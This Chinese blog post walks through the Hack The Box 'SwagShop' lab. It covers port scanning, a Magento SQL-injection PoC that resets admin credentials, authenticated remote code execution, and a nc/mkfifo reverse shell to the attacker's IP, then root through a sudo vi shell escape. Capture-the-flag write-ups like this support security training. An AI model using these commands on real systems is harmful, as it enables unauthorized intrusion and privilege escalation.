【Hack The Box】linux练习-- SwagShop

HTB 学习笔记

【Hack The Box】linux练习-- SwagShop


🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

在这里插入图片描述

信息收集

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

需要添加hosts,在url显现出了
在这里插入图片描述gedit /etc/hosts
在这里插入图片描述
而后我们发现这是一个购物网站
具体功能点没有发现有什么
在这里插入图片描述搜索一下开源cms
在这里插入图片描述我想知道版本信息

在这里插入图片描述看到一个应该是插件的更新日志吧
先放着

THIS IS A METAPACKAGE FOR UPGRADE FROM 0.9 TO 1.0

Mage_Core_Modules

  • Mage_Core_Adminhtml
  • Interface_Adminhtml_Default
  • Interface_Frontend_Default
  • Interface_Install_Default
gobuster dir -u http://swagshop.htb/index.php/ -x php -w /usr/share/dirb/wordlists/common.txt

可以深度扫描
也可以习惯性的访问一下admin页面,果然有
但是弱口令无效

在这里插入图片描述因为网站底部显示这个是2014年,于是我去搜历史版本发布时间
在这里插入图片描述
两个版本,一个是1.9一个是1.14
在这里插入图片描述但是37811我们用不了,他需要认证,需要我们提供用户账号密码
于是我找到了一个exp
如下,可以直接修改后台账号密码

https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py

在这里插入图片描述后台账号密码已经成功修改
在这里插入图片描述

现在我已经拿到了登陆凭据,我可以利用刚才的那个exp了

按照如下利用

python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""

但是我们在这之前还要先去修改一下py

在这里插入图片描述这个是我们刚才目录扫描扫出来的
时间戳按照提示去找即可

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

python2 37811.py 'http://swagshop.htb/index.php/admin' "uname -a"

在这里插入图片描述
在这里插入图片描述是的,我也不知道这个错误的产生以及如何解决,但我知道“如果解决不了问题,那就解决产生问题的人”

直接把报错的那一行删掉
在这里插入图片描述

python2 37811.py 'http://swagshop.htb/index.php/admin' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 9001 >/tmp/f"
python -c 'import pty;pty.spawn("/bin/bash")'. python3也有效。
Ctrl-z 到后台 shell。 在本地提示下, stty raw -echo.
fg将外壳带回前面。
reset重新初始化终端。 如果提示输入终端类型,请输入 screen.
在重置外壳中, export TERM=screen.
www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

sudo /usr/bin/vi /var/www/html/…/…/…/root/root.txt

二进制提权

sudo vi /var/www/html/a -c ':!/bin/sh'
或者
sudo vi -c ':!/bin/sh' /dev/null
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 Reel虚拟机是以恶意软件传播为主题的,这是一个很常见但危险的网络攻击。在解决这个靶场时,你需要进行全面的信息搜集,发现可能的漏洞,并利用这些漏洞来控制系统。你还需要进行各种网络嗅探和流量分析操作,以便找到系统中的隐藏服务和登录凭证。 在攻击过程中,你需要利用各种漏洞包括未经授权的访问和远程执行代码等。还需要理解和使用不同的入侵技术,例如命令注入和文件上传等。此外,你可能还需要对恶意软件的分析和行为进行深入研究,以了解其运行机制。 HackTheBox - Reel不仅测试了你的渗透测试技能,而且还促使你加强对恶意软件攻击和防护的了解。同时,这个靶场还有很多高级技术和技巧需要掌握。通过挑战这样的虚拟机,你可以提高你的安全意识和技能,以应对更复杂和高级的网络攻击。 总之,HackTheBox - Reel是一个非常有挑战性的虚拟机靶场,通过攻击和渗透测试,你将提高你的安全技能,并了解到如何防范和对抗恶意软件传播。这是一个很好的方式来锻炼和提升你的网络安全技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值